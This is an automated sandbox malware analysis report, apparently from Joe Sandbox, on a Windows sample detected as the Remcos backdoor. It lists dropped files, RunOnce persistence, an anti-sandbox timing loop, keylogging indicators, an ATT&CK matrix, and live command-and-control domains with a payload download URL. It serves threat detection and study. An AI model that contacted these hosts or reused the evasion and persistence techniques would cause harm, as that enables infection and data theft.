              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 4_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_00402198 CoCreateInstance,MultiByteToWideChar
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | File created: C:\Users\user\AppData\Roaming\chlorenchyma
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-3DX9QW
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | File created: C:\Users\user\AppData\Local\Temp\nsr488B.tmp
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | File read: C:\Users\desktop.ini
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | ReversingLabs: Detection: 28%
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Virustotal: Detection: 16%
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | File read: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
              Source: unknown | Process created: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process created: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process created: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: userenv.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: apphelp.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: propsys.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: dwmapi.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: oleacc.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: ntmarta.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: version.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: shfolder.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: riched20.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: usp10.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: msls31.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: textinputframework.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: coreuicomponents.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: coremessaging.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: wintypes.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: textshaping.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: windows.storage.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: wldp.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: kernel.appcore.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: uxtheme.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: wininet.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: iertutil.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: sspicli.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: profapi.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: winhttp.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: mswsock.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: iphlpapi.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: winnsi.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: urlmon.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: srvcli.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: netutils.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: dnsapi.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: rasadhlp.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: fwpuclnt.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: schannel.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: mskeyprotect.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: ntasn1.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: msasn1.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: dpapi.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: cryptsp.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: rsaenh.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: cryptbase.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: gpapi.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: ncrypt.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: ncryptsslp.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              Source: Yara match | File source: 00000000.00000002.2056638671.000000000433E000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_6E331B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | File created: C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | File created: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Startup key
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | API/Special instruction interceptor: Address: 4645339
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | API/Special instruction interceptor: Address: 1B25339
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | RDTSC instruction interceptor: First address: 45E1793 second address: 45E1793 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, dx 0x00000005 jmp 00007F6064C2CF2Fh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F6064C2CEDEh 0x0000000b cmp eax, ebx 0x0000000d inc ebp 0x0000000e test cl, al 0x00000010 inc ebx 0x00000011 test edi, 0EBC10DBh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | RDTSC instruction interceptor: First address: 1AC1793 second address: 1AC1793 instructions: 0x00000000 rdtsc 0x00000002 cmp bx, dx 0x00000005 jmp 00007F6064DE03DFh 0x00000007 cmp ebx, ecx 0x00000009 jc 00007F6064DE038Eh 0x0000000b cmp eax, ebx 0x0000000d inc ebp 0x0000000e test cl, al 0x00000010 inc ebx 0x00000011 test edi, 0EBC10DBh 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Window / User API: threadDelayed 3344
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe TID: 4504 | Thread sleep count: 3344 > 30
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Thread sleep count: Count: 3344 delay: -5
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_00406620 FindFirstFileA,FindClose
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_004027CF FindFirstFileA
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 4_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 4_2_00406620 FindFirstFileA,FindClose
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 4_2_004027CF FindFirstFileA
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | API call chain: ExitProcess graph end node graph_0-4729
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | API call chain: ExitProcess graph end node graph_0-4878
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_6E331B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Process created: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe "C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerD
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerO
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerQW\
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manageri
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager]
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerY
              Source: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.dr | Binary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Code function: 0_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

              Stealing of Sensitive Information

              Source: Yara match | File source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe PID: 1076, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              Source: C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | Mutex created: \Sessions\1\BaseNamedObjects\Rmc-3DX9QW
              Source: Yara match | File source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: IMG635673567357735773573757875883587935775753Bjlkeloftet.exe PID: 1076, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
MITRE ATT&CK Matrix (the number before a technique is the signature count shown in the original matrix; cells without a number had no matching signature)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 1 Masquerading | 11 Input Capture | 31 Security Software Discovery | Remote Services | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 12 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Archive Collected Data | 1 Remote Access Software | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | 213 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Obfuscated Files or Information | Cached Domain Credentials | 23 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Antivirus detection, submitted sample:

Source | Detection | Scanner | Label
IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | 29% | ReversingLabs | Win32.Backdoor.Remcos
IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | 16% | Virustotal |
IMG635673567357735773573757875883587935775753Bjlkeloftet.exe | 100% | Avira | HEUR/AGEN.1337950

Antivirus detection, dropped files:

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe | 100% | Avira | HEUR/AGEN.1337950
C:\Users\user\AppData\Local\Temp\nsv507D.tmp\System.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\subfolder1\Vaskegthed.exe | 29% | ReversingLabs | Win32.Backdoor.Remcos

No Antivirus matches

Antivirus detection, domains:

Source | Detection | Scanner | Label
odumeje.duckdns.org | 2% | Virustotal |
odumegwu.duckdns.org | 1% | Virustotal |
bdias.com | 0% | Virustotal |
odumeje1.duckdns.org | 2% | Virustotal |

Antivirus detection, URLs:

Source | Detection | Scanner | Label
odumeje.duckdns.org | 0% | Avira URL Cloud | safe
https://bdias.com/zjMSeQNkb41.bin2 | 0% | Avira URL Cloud | safe
https://bdias.com/zjMSeQNkb41.bin/ | 0% | Avira URL Cloud | safe
https://bdias.com/ | 0% | Avira URL Cloud | safe
http://bdias.com/zjMSeQNkb41.binm | 0% | Avira URL Cloud | safe
https://bdias.com/zjMSeQNkb41.bin | 0% | Avira URL Cloud | safe
http://bdias.com/zjMSeQNkb41.bin | 0% | Avira URL Cloud | safe
odumegwu.duckdns.org | 0% | Avira URL Cloud | safe
http://bdias.com/zjMSeQNkb41.bine | 0% | Avira URL Cloud | safe
odumeje1.duckdns.org | 0% | Avira URL Cloud | safe
http://bdias.com/zjMSeQNkb41.binj | 0% | Avira URL Cloud | safe
Domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
odumeje.duckdns.org | 192.169.69.26 | true | true | | unknown
odumegwu.duckdns.org | 192.169.69.26 | true | true | | unknown
bdias.com | 91.196.125.125 | true | false | | unknown
odumeje1.duckdns.org | 192.169.69.26 | true | true | | unknown

Contacted URLs:

Name | Malicious | Antivirus Detection | Reputation
odumeje.duckdns.org | true | Avira URL Cloud: safe | unknown
https://bdias.com/zjMSeQNkb41.bin | false | Avira URL Cloud: safe | unknown
http://bdias.com/zjMSeQNkb41.bin | false | Avira URL Cloud: safe | unknown
odumegwu.duckdns.org | true | Avira URL Cloud: safe | unknown
odumeje1.duckdns.org | true | Avira URL Cloud: safe | unknown

URLs found in memory and binary data:

Name | Source | Malicious | Antivirus Detection | Reputation
http://nsis.sf.net/NSIS_Error | IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, Vaskegthed.exe.4.dr | false | | high
https://bdias.com/zjMSeQNkb41.bin2 | IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bdias.com/zjMSeQNkb41.bin/ | IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bdias.com/ | IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://bdias.com/zjMSeQNkb41.binm | IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, Vaskegthed.exe.4.dr | false | | high
http://bdias.com/zjMSeQNkb41.bine | IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://bdias.com/zjMSeQNkb41.binj | IMG635673567357735773573757875883587935775753Bjlkeloftet.exe, 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
192.169.69.26 | odumeje.duckdns.org | United States | 23033 | WOWUS | true
91.196.125.125 | bdias.com | Bulgaria | 201200 | SUPERHOSTING_ASBG | false
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1554912
                  Start date and time:2024-11-13 08:17:07 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 6m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/14@8/2
                  EGA Information:
                  • Successful, ratio: 50%
                  HCA Information:
                  • Successful, ratio: 88%
                  • Number of executed functions: 46
                  • Number of non-executed functions: 62
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
